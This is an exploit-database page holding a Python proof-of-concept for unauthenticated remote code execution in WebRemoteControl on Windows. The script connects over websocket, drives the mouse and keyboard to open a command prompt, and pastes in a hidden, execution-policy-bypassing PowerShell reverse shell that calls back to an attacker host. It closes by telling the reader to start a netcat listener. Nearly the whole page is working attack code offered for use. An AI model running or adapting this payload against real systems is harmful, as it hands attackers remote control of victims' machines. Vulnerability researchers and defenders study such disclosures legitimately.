Share
## https://sploitus.com/exploit?id=PACKETSTORM:218911
# Exploit Title: WebRemoteControl - Unauthenticated Remote Code Execution
    # Date: 2026-04-14
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/wolfgangasdf/WebRemoteControl
    # Software Link:
    https://github.com/wolfgangasdf/WebRemoteControl/releases/download/SNAPSHOT/webremotecontrol-windows-x64.zip
    # Version: SNAPSHOT
    # Tested on: Windows 10
    
    
    #!/usr/bin/env python3
    
    import websocket, time
    
    LHOST = "192.168.1.104"
    LPORT = "4444"
    
    ps_command = f'powershell -NoP -NonI -W Hidden -Exec Bypass -Command
    "$client = New-Object
    System.Net.Sockets.TCPClient(\'{LHOST}\',{LPORT});$stream =
    $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i =
    $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object
    -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =
    (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' +
    (pwd).Path + \'> \';$sendbyte =
    ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"'
    
    ws = websocket.create_connection("ws://172.16.126.135:8000/docs/cmd",
    timeout=5)
    ws.recv()
    
    print("[>] Moving to Start button...")
    ws.send("move\t-2000\t2000")
    time.sleep(0.5)
    
    print("[>] Click Start button...")
    ws.send("tap")
    time.sleep(0.5)
    
    print("[>] Typing 'cmd'...")
    for c in "cmd":
        ws.send(f"char\t{c}")
        time.sleep(0.2)
    
    time.sleep(0.5)
    print("[>] Pressing Enter to open cmd...")
    ws.send("char\t\n")
    time.sleep(1)
    
    print("[>] Pasting PowerShell reverse shell...")
    ws.send(f"pastetext\t{ps_command}")
    time.sleep(0.5)
    
    print("[>] Pressing Enter to execute...")
    ws.send("char\t\n")
    
    ws.close()
    print(f"[โœ“] Reverse shell sent to {LHOST}:{LPORT}! Start your listener: nc
    -lvnp {LPORT}")